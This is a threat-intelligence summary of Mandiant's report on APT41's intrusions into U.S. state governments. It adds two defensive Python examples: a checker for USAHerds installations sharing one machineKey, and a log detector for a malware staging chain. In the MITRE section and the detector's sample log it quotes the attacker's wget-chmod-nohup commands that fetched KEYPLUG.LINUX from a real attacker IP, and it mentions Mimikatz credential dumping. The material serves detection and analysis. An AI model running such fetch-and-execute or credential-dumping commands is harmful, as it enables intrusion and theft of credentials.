APT41’s operations against U.S. state governments leveraged multiple, overlapping campaigns: initial access via a USAHerds web app vulnerability (CVE-2021-44207), followed by Log4Shell (CVE-2021-44228) deserialization to deploy backdoors, including KEYPLUG.LINUX on Linux hosts. The operation combined aggressive reconnaissance and credential harvesting, AD discovery, an in-memory dropper (DUSTPAN), and anti-analysis techniques (DEADEYE/DEADEYE.EMBED and VMProtect), with post-exploitation activity aimed at establishing footholds and resilient C2. #APT41 #Log4Shell #KEYPLUG #DUSTPAN #DEADEYE #DEADEYE.EMBED
Key points
- APT41 exploited USAHerds CVE-2021-44207 in multiple investigations, enabling broad compromise due to a shared machineKey value across installations.
- Once access was gained, the actors performed extensive host/network reconnaissance and credential harvesting (Mimikatz, SAM/SYSTEM hives).
- Active Directory reconnaissance was conducted using dsquery.exe/dsquery.dll to enumerate AD objects.
- The campaign followed Log4Shell (CVE-2021-44228) exploitation with deserialization payloads to perform reconnaissance and deploy backdoors.
- New Linux backdoor KEYPLUG.LINUX was deployed after exploiting Log4Shell, with C2 over multiple protocols (HTTP, TCP, KCP/UDP, WSS).
- DUSTPAN acted as an in-memory dropper to facilitate deployment of a Cobalt Strike BEACON backdoor.
- Anti-analysis techniques included DEADEYE/DEADEYE.EMBED (ADS storage), VMProtect packaging, and multi-section binary construction to hinder forensics.
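The first key point is that one exploit worked against every USAHerds installation because they all carried the same machineKey. A defender's fleet-wide check for that condition is shown below as an added example; it is not code from the Mandiant report or from USAHerds. It assumes web.config files have been collected from several hosts and uses constructed, placeholder key values (the real keys are not on this page). Keys are fingerprinted with a truncated SHA-256 so the report never reproduces the secret itself.

```python
import hashlib
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed web.config fragments standing in for files collected from several hosts.
# The key values are made-up placeholders, not the real USAHerds machineKey.
SHARED_KEYS = (
    'validationKey="AAAA1111AAAA1111AAAA1111AAAA1111AAAA1111AAAA1111AAAA1111AAAA1111" '
    'decryptionKey="BBBB2222BBBB2222BBBB2222BBBB2222"'
)
SAMPLE_CONFIGS = {
    "usaherds-state-a": f"""<configuration><system.web>
        <machineKey {SHARED_KEYS} validation="SHA1" decryption="AES"/>
    </system.web></configuration>""",
    "usaherds-state-b": f"""<configuration><system.web>
        <machineKey {SHARED_KEYS} validation="SHA1" decryption="AES"/>
    </system.web></configuration>""",
    "other-app": """<configuration><system.web>
        <machineKey validationKey="AutoGenerate,IsolateApps"
                    decryptionKey="AutoGenerate,IsolateApps"/>
    </system.web></configuration>""",
    "no-machinekey": "<configuration><system.web></system.web></configuration>",
}


def machine_key_fingerprint(config_xml):
    """Return (fingerprint, is_static) for the machineKey in a web.config, or None if
    the element is absent. ASP.NET defaults both keys to AutoGenerate when omitted,
    so a key is 'static' if either attribute carries an explicit value."""
    root = ET.fromstring(config_xml)
    mk = root.find(".//machineKey")
    if mk is None:
        return None
    vkey = mk.get("validationKey", "AutoGenerate")
    dkey = mk.get("decryptionKey", "AutoGenerate")
    is_static = not vkey.startswith("AutoGenerate") or not dkey.startswith("AutoGenerate")
    digest = hashlib.sha256(f"{vkey}|{dkey}".encode()).hexdigest()[:16]
    return digest, is_static


def find_shared_machine_keys(configs):
    """Group hosts by static machineKey fingerprint and return only the fingerprints
    that more than one host uses: the condition that let a single forged ViewState
    payload work against every installation."""
    by_fp = defaultdict(list)
    for host, xml_text in configs.items():
        result = machine_key_fingerprint(xml_text)
        if result is None:
            continue
        fp, is_static = result
        if is_static:
            by_fp[fp].append(host)
    return {fp: sorted(hosts) for fp, hosts in by_fp.items() if len(hosts) > 1}


if __name__ == "__main__":
    for fp, hosts in find_shared_machine_keys(SAMPLE_CONFIGS).items():
        print(f"machineKey {fp} is shared by: {', '.join(hosts)}")
```

A static machineKey on a single host is a normal deployment choice (it is required for web farms); the finding worth acting on is the same static key appearing on installations that have no reason to share one, which is what the grouping surfaces.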
MITRE Techniques
- [T1190] Exploit Public-Facing Application – exploited a zero-day vulnerability in the USAHerds web application. “In three investigations from 2021, APT41 exploited a zero-day vulnerability in the USAHerds web application.” The vulnerability allowed compromise across installations due to default machineKey values.
- [T1203] Exploitation for Client Execution – used Log4Shell to fetch and deserialize a remote Java object for code execution and deployed backdoors via deserialization payloads. “Exploiting this vulnerability, also known as Log4Shell, causes Java to fetch and deserialize a remote Java object, resulting in potential code execution.” And “deserialization payloads to perform reconnaissance and deploy backdoors.”
- [T1105] Ingress Tool Transfer – downloaded and deployed KEYPLUG.LINUX using wget. “Sample commands used to deploy KEYPLUG.LINUX can be seen in Figure 6.” and “wget http://103.224.80[.]44:8080/kernel chmod 777 kernel mv kernel .kernel nohup ./.kernel”
- [T1003.002] Credential Dumping – dumped SAM/NTLM credentials and used Mimikatz lsadump::sam. “they copied the local SAM and SYSTEM registry hives to a staging directory for credential harvesting and exfiltration. APT41 has additionally used Mimikatz to execute the lsadump::sam command on the dumped registry hives to obtain locally stored credentials and NTLM hashes.”
- [T1069.002] Active Directory Discovery – enumerated AD objects with dsquery.exe/dsquery.dll. “Figure 7: dsquery Active Directory Reconnaissance Commands.”
- [T1564.001] Hide Artifacts: Alternate Data Streams – DEADEYE.EMBED stored in an Alternate Data Stream to conceal payloads. “DEADEYE.EMBED variants embed the payload inside of the compiled binary rather than appended to the overlay…”
- [T1497] Virtualization/Sandbox Evasion – VMProtect used to slow reverse engineering, with anti-analysis via multi-section binary packaging. “VMProtect to slow reverse engineering efforts” and “chunking a VMProtect packaged DEADEYE binary into multiple sections on disk.”
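The T1105 entry quotes the four-command sequence used to stage KEYPLUG.LINUX (fetch from an IP on a non-standard port, chmod 777, rename to a dotfile, run under nohup). The detection below is an added example, not code from the Mandiant report: it replays constructed command-audit lines in an assumed `uid=... cmd=...` format, flags any command that references the infrastructure listed in this page's IoCs, and separately tracks the staging chain per user so that the pattern is caught even when the infrastructure changes. The log lines are constructed for the example and only reuse indicators already on the page.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Infrastructure taken from the IoC list on this page.
IOC_HOSTS = {"103.224.80.44", "libxqagv.ns.dns3.cf"}

# Constructed audit lines in an assumed "uid=<n> cmd=<command line>" format,
# modelled on the Figure 6 commands quoted above plus benign activity.
SAMPLE_LOG = [
    "uid=33 cmd=wget http://103.224.80.44:8080/kernel",
    "uid=33 cmd=chmod 777 kernel",
    "uid=33 cmd=mv kernel .kernel",
    "uid=33 cmd=nohup ./.kernel",
    "uid=1000 cmd=wget https://deb.debian.org/debian/pool/main/c/curl/curl_7.88.1.orig.tar.gz",
    "uid=1000 cmd=ping -c 1 libxqagv.ns.dns3.cf",
]

LINE_RE = re.compile(r"uid=(\d+)\s+cmd=(.+)")


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze(lines):
    """Return a list of (kind, uid, detail) findings. kind is 'ioc' for a command
    that touches known infrastructure, 'dropper_chain' for the full staging sequence."""
    findings = []
    staged = {}  # uid -> {"file": current name, "stage": 1..3, "src": host:port}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        uid, cmd = m.group(1), m.group(2).strip()
        argv = cmd.split()

        # 1. Direct indicator match on any URL host or bare hostname token.
        for token in argv:
            host = urlparse(token).hostname if "://" in token else token
            if host in IOC_HOSTS:
                findings.append(("ioc", uid, f"{host} referenced by: {cmd}"))

        # 2. Behavioural chain: wget from an IP literal on a non-web port ->
        #    chmod 777 of that file -> mv to a dotfile -> nohup of the dotfile.
        st = staged.get(uid)
        if argv[0] == "wget" and len(argv) > 1:
            url = urlparse(argv[-1])
            if url.hostname and is_ip_literal(url.hostname) and url.port not in (None, 80, 443):
                fname = url.path.rsplit("/", 1)[-1]
                staged[uid] = {"file": fname, "stage": 1, "src": f"{url.hostname}:{url.port}"}
        elif argv[:2] == ["chmod", "777"] and st and st["stage"] == 1 and argv[-1] == st["file"]:
            st["stage"] = 2
        elif argv[0] == "mv" and len(argv) == 3 and st and st["stage"] == 2 \
                and argv[1] == st["file"] and argv[2].startswith("."):
            st["stage"], st["file"] = 3, argv[2]
        elif argv[0] == "nohup" and len(argv) > 1 and st and st["stage"] == 3 \
                and argv[1] in (st["file"], "./" + st["file"]):
            findings.append(("dropper_chain", uid,
                             f"{st['file']} fetched from {st['src']}, made world-executable, "
                             f"hidden as a dotfile and launched with nohup"))
            del staged[uid]
    return findings


if __name__ == "__main__":
    for kind, uid, detail in analyze(SAMPLE_LOG):
        print(f"[{kind}] uid={uid}: {detail}")
```

The chain rule keys on the behaviour rather than the literal filename `kernel`, so it still fires if the operator renames the payload; the IoC rule is the cheap exact match that catches reuse of the infrastructure named in the report.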
Indicators of Compromise
- [IP] 103.224.80.44:8080 – host for kernel delivery and command retrieval during KEYPLUG.LINUX deployment
- [Domain] libxqagv.ns.dns3.cf – attacker-controlled domain used in ping commands and C2 infrastructure
- [URL] http://103.224.80.44:8080/kernel – URL used to fetch the KEYPLUG.LINUX payload
- [MD5] 49f1daea8a115dd6fce51a1328d863cf – dsquery.exe MD5
- [MD5] b108b28138b93ec4822e165b82e41c7a – dsquery.dll MD5
- [CVE] CVE-2021-44207 – USAHerds vulnerability exploited by APT41
- [CVE] CVE-2021-44228 – Log4Shell vulnerability exploited by APT41
Read more: https://www.mandiant.com/resources/apt41-us-state-governments